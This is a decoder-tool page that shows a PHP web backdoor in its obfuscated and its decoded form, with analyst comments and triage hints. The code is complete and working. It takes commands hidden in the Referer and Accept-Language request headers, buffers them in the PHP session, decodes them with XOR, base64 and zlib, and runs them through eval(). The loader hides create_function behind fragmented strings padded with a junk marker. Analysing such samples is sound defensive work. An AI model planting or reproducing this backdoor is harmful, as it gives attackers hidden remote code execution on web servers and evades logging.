
PHP Decode

<?php $q='[$m[2]RwRw[$z]];if(strpoRws($p,RwRw$h)===Rw0){$s[$i]=Rw"";$p=$sRws($p,3);Rw}if(R..

Decoded Output

// Decoded payload of a PHP web backdoor (analysis annotations only; code tokens unchanged).
// Summary: it reads a command stream hidden in two request headers, reassembles it
// across requests in the PHP session, then decodes and eval()s it and returns the
// captured output in the response body. Nothing is read from the URL path or the
// POST body, so access logs that omit Referer / Accept-Language will not show the traffic.
// NOTE(review): the layout ($kh/$kf key halves, XOR helper x(), Referer + Accept-Language
// channel) resembles the older Weevely-generated agent - confirm against known samples.
// The $t{$i} string-offset syntax was removed in PHP 8.0, so this code only parses on older PHP.

// Two 4-character halves of the shared key. Each half also salts an md5() below to
// derive the start/end markers; concatenated they form the XOR key and the reply tag.
$kh="5d41";
$kf="402a";
// x(): repeating-key XOR of $t with $k. This is obfuscation, not encryption - the key
// is embedded in the file, so a captured payload can be decoded by a responder.
function x($t,$k){
    $c=strlen($k);
    $l=strlen($t);
    $o="";
    for($i=0;$i<$l;){
        for($j=0;($j<$c&&$i<$l);$j++,$i++){
            $o.=$t{$i}^$k{$j};
        }
    }
    return $o;
}
$r=$_SERVER;
// Both inputs are attacker-controlled request headers; @ hides the notice when absent.
$rr=@$r["HTTP_REFERER"];
$ra=@$r["HTTP_ACCEPT_LANGUAGE"];
// Ordinary requests that lack either header fall straight through and see no side effects.
if($rr&&$ra){
    $u=parse_url($rr);
    // Query-string values of the Referer URL, re-indexed 0..n-1 so they can be picked by position.
    parse_str($u["query"],$q);
    $q=array_values($q);
    // Per language entry: $m[1] = first character of the tag, $m[2] = the single digit after "q=0.".
    preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);
    if($q&&$m){
        @session_start();
        // By-reference alias: writes to $s persist in the session between requests.
        $s=&$_SESSION;
        // Function names held in variables, so substr()/strtolower() are only called indirectly.
        $ss="substr";
        $sl="strtolower";
        // Session slot name: first characters of the first two language tags.
        $i=$m[1][0].$m[1][1];
        // 3-character start ($h) and end ($f) markers derived from that name and the key halves.
        $h=$sl($ss(md5($i.$kh),0,3));
        $f=$sl($ss(md5($i.$kf),0,3));
        $p="";
        // Each language entry after the first selects one Referer query value by its q digit;
        // the selected values are concatenated into this request's chunk.
        for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];
        // A chunk that begins with the start marker resets the session buffer.
        if(strpos($p,$h)===0){
            $s[$i]="";
            $p=$ss($p,3);
        }
        // Chunks are only accepted once a start marker has created the slot.
        if(array_key_exists($i,$s)){
            $s[$i].=$p;
            // Truthiness test: an end marker at offset 0 is treated the same as "not found".
            $e=strpos($s[$i],$f);
            if($e){
                $k=$kh.$kf;
                ob_start();
                // Execution sink: the buffered text up to the end marker is mapped from
                // URL-safe base64 ("_" -> "/", "-" -> "+"), base64-decoded, XOR-decoded,
                // zlib-inflated and passed to eval(). Whatever PHP the sender supplied runs
                // inside the web application's PHP process.
                eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));
                $o=ob_get_contents();
                ob_end_clean();
                // Output goes back the same way in reverse: deflate, XOR, base64.
                $d=base64_encode(x(gzcompress($o),$k));
                // Response indicator: the reply is wrapped in a tag named after the 8-character
                // key, i.e. "<5d41402a>...</5d41402a>" for this sample.
                print("<$k>$d</$k>");
                // The session is destroyed after each completed command, so no buffer is left behind.
                @session_destroy();
            }
        }
    }
}


Original Code

<?php
// Obfuscated loader for a PHP backdoor. The payload source is split into ten
// out-of-order string fragments, each salted with the junk marker "Rw"; none of
// the fragments is valid or recognisable PHP until they are joined and the
// marker is stripped. It depends on create_function(), which was removed in
// PHP 8.0, so the loader only runs on older PHP versions.
$q='[$m[2]RwRw[$z]];if(strpoRws($p,RwRw$h)===Rw0){$s[$i]=Rw"";$p=$sRws($p,3);Rw}if(RwaRwrray_key_existRws($i,$RwRws)){$s[$i].=Rw$';
// Hides the name of the dynamic-code primitive: deleting every "D" leaves "create_function".
$F=str_replace('D','','DcreaDteD_fDunDctDion');
$Z='FERER"]RwRw;$rRwa=@$r["HTTRwP_ACCEPT_LANGUAGE"]Rw;Rwif($rr&&$Rwra){$uRw=pRwRwarse_url($rr);parRwRwse_sRwRwtr($u["qRwuery"],$';
$v='q);$q=arRwray_valueRws($q);pRwRwreg_matchRw_all("/([\\Rww])Rw[\\wRw-]+(?:;q=0.(Rw[\\Rwd]))RwRw?,?/",$ra,$mRw);if($q&Rw&Rw$m){';
$n='w(RwpreRwg_replacRwe(Rwarray("/_/","/-/")Rw,arrayRw("/","+"Rw),$ssRw($s[$Rwi]Rw,0,Rw$e)))Rw,$k)RwRw));$o=ob_gRwet_contents()';
$z=';obRw_end_Rwclean();Rw$dRwRw=basRwe64_encode(x(gzcoRwmpress($o)Rw,$k));pRwrRwintRw("<$k>$d</Rw$k>");@seRwssion_dRwestroyRw();}}}}';
$k='ss(md5($i.$kRwh)Rw,0,3));Rw$f=$sl($Rwss(mRwRwdRw5($i.$kf),0,Rw3));RwRw$p="";foRwr($z=1;$z<counRwt($m[1]);Rw$z++)Rw$p.=Rw$q';
// Fragment carrying the execution sink: with the marker removed it contains
// "@eval(@gzuncompress(@x(@base64_decod". The page's decoded listing prints the
// eval and base64_decode calls without their "@", so signatures should not
// anchor on the exact decoded text.
$h='Rwp;$e=sRwtrpos(Rw$s[$i],$fRw);iRwf($e){$k=$kRwh.$kfRw;Rwob_start();@RwevRwaRwl(@gzuncRwompress(@x(@RwbaRwse64_decodRweR';
$S='wr($j=Rw0;($j<$c&Rw&$i<$l);Rw$j+Rw+,$i+Rw+){$oRw.=$t{$i}^$k{Rw$j};}}reRwturnRw $o;}$r=Rw$_SERVRwER;$rRwr=@$r["RwHTTRwP_RRwERw';
$b='$kh="5d41";RwRw$kf="40Rw2Rwa";funcRwtion x($t,$k)Rw{$c=strlRwen(Rw$k);$l=Rwstrlen($Rwt)Rw;$o="";fRwRwor($i=0;Rw$i<$l;)Rw{foR';
$y='@sRwession_staRwrt();$s=&$_RwSESRwSION;$ss="RwsubRwRwstr";$sRwl="sRwtrtolower";$i=$mRwRw[1][0].$m[1]Rw[Rw1];$h=Rw$sl(Rw$';
// Joins the fragments in their real order, then strips every "Rw". The marker can
// straddle a fragment boundary ($b ends in "R" and $S starts with "w"; likewise $h
// and $n), so cleaning fragments one at a time does not recover the payload.
$G=str_replace('Rw','',$b.$S.$Z.$v.$y.$k.$q.$h.$n.$z);
// $F resolves to create_function: the rebuilt string is compiled as the body of an
// anonymous function (equivalent to eval) and invoked at once, each time this file
// executes. Triage signal: a str_replace() result used as a callable whose output
// is called immediately.
$m=$F('',$G);$m();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$F create_function
$G $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$S wr($j=Rw0;($j<$c&Rw&$i<$l);Rw$j+Rw+,$i+Rw+){$oRw.=$t{$i}^$k{..
$Z FERER"]RwRw;$rRwa=@$r["HTTRwP_ACCEPT_LANGUAGE"]Rw;Rwif($rr&&..
$b $kh="5d41";RwRw$kf="40Rw2Rwa";funcRwtion x($t,$k)Rw{$c=strlR..
$h Rwp;$e=sRwtrpos(Rw$s[$i],$fRw);iRwf($e){$k=$kRwh.$kfRw;Rwob_..
$k ss(md5($i.$kRwh)Rw,0,3));Rw$f=$sl($Rwss(mRwRwdRw5($i.$kf),0,..
$m None
$n w(RwpreRwg_replacRwe(Rwarray("/_/","/-/")Rw,arrayRw("/","+"R..
$q [$m[2]RwRw[$z]];if(strpoRws($p,RwRw$h)===Rw0){$s[$i]=Rw"";$p..
$v q);$q=arRwray_valueRws($q);pRwRwreg_matchRw_all("/([\Rww])Rw..
$y @sRwession_staRwrt();$s=&$_RwSESRwSION;$ss="RwsubRwRwstr";$s..
$z ;obRw_end_Rwclean();Rw$dRwRw=basRwe64_encode(x(gzcoRwmpress(..

Stats

MD5 0c29c860a41f8e7273c846e6cb4d4def
Eval Count 1
Decode Time 85 ms